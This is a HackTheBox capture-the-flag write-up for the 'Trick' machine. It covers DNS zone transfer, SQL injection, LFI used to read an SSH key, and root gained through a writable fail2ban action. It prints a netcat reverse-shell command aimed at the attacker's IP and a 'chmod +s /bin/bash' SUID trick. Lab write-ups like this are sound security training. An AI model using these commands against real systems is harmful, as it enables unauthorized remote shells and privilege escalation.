# HackThBox - Trick

## NMAP

```bash
Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## PORT 80 (HTTP)

On the web page we see a bootstrap template which has nothing intersting

<img src="https://i.imgur.com/MwFbM4d.png"/>

Fuzzing for files and directories it didn't found anything as well

<img src="https://i.imgur.com/kRQgYfD.png"/>

## PORT 53 (DNS)

Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name

https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

`dig -x 10.10.11.166 @10.10.11.166`

<img src="https://i.imgur.com/ba3zxyv.png"/>

Having the `trick.htb` we can add this in hosts file

<img src="https://i.imgur.com/jDSYKGt.png"/>

Now to enumerate further we can perform the dns zone transfer

<img src="https://i.imgur.com/Z3rUXsY.png"/>

This shows `root.trick.htb` subdomain but it doesn't take us anywhere, on performing zone transfer with `axfr`

<img src="https://i.imgur.com/4GZ7DZL.png"/>

We get another domain name `preprod-payroll.trick.htb`, so let's add this in hosts file as well

<img src="https://i.imgur.com/b52rmd1.png"/>

Visting this subdomain, we'll get a login page on which we can try default credentials 

<img src="https://i.imgur.com/s0rpUwi.png"/>

<img src="https://i.imgur.com/kxP8ZYp.png"/>

Which didn't worked, so next I tried sqli

<img src="https://i.imgur.com/scRFq1D.png"/>

That worked, so I tried running `sqlmap` but `time-based blind` so it's gonna take a lot of time in dumping the data

<img src="https://i.imgur.com/tyNa8sd.png"/>


## Foothold

Going back to the site we can see a GET parameter `page` fetching for pages, I tried to perform LFI on that parameter but it didn't worked

I tried running `wfuzz` against the parameter using LFI wordlist 

<img src="https://i.imgur.com/WkDekCt.png"/>

<img src="https://i.imgur.com/Sqj5dRC.png"/>

Which didn't worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we'll get a GET parameter `id`  which also is vulnerable to sqli

<img src="https://i.imgur.com/yPxDULh.png"/>

<img src="https://i.imgur.com/0UaS1GK.png"/>

<img src="https://i.imgur.com/8HZLpuI.png"/>

It shows that it's boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file

<img src="https://i.imgur.com/tG0SIvk.png"/>

This shows another subdomain `preprod-marketing.trick.htb`

<img src="https://i.imgur.com/Khdf3CI.png"/>

Alternatively we can enumerate this subdomain by running wfuzz

<img src="https://i.imgur.com/7XJySOA.png"/>

<img src="https://i.imgur.com/cQwqVUW.png"/>

This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well

<img src="https://i.imgur.com/tFK97Q7.png"/>

<img src="https://i.imgur.com/qp24LsL.png"/>

This starts to give us some output on filterting the response

<img src="https://i.imgur.com/pVW4KjH.png"/>

We have the username `michael` , we can try to see if we can access his .ssh folder for `id_rsa`

<img src="https://i.imgur.com/KvmF2lj.png"/>

<img src="https://i.imgur.com/mfvA1DJ.png"/>

## Privilege Escalation

Running `sudo -l` to check if we can run with sudo privileges

<img src="https://i.imgur.com/JnQupEJ.png"/>

So we can restart the `fail2ban` service but we don't know exaclty what we need to edit, being in security group we can check what permissions this group has

<img src="https://i.imgur.com/mdqEqZn.png"/>

We have write access to this folder which has configuration files for fail2ban 

<img src="https://i.imgur.com/KAxu3kE.png"/>

I found an article explaining how we can abuse fail2ban config file 

https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7

For this we need to edit the `actionban` command in `iptables-multiport.conf`, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell

```bash
/usr/bin/nc 10.10.14.39 2222 -e /bin/bash
```

<img src="https://i.imgur.com/a7pYDLu.png"/>

After editing the config file, move it back to the action.d folder and restart fail2ban service

<img src="https://i.imgur.com/UVqiGM0.png"/>

Then start doing fail attempts on login, you'll get a reverse shell on your port

<img src="https://i.imgur.com/5XoSG2C.png"/>

But our reverse shell connection dies and the reason behind this is, the ban duration lasts for 10 seconds and bans the host after the 5th attempt

<img src="https://i.imgur.com/8dfOlrn.png"/>

Instead of getting a reverse shell we can just make bash a SUID with `chmod +s /bin/bash`

<img src="https://i.imgur.com/HJFuAxr.png"/>

Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt

<img src="https://i.imgur.com/kw67ztg.png"/>

<img src="https://i.imgur.com/oqOCN4B.png"/>


## References

- https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
- https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7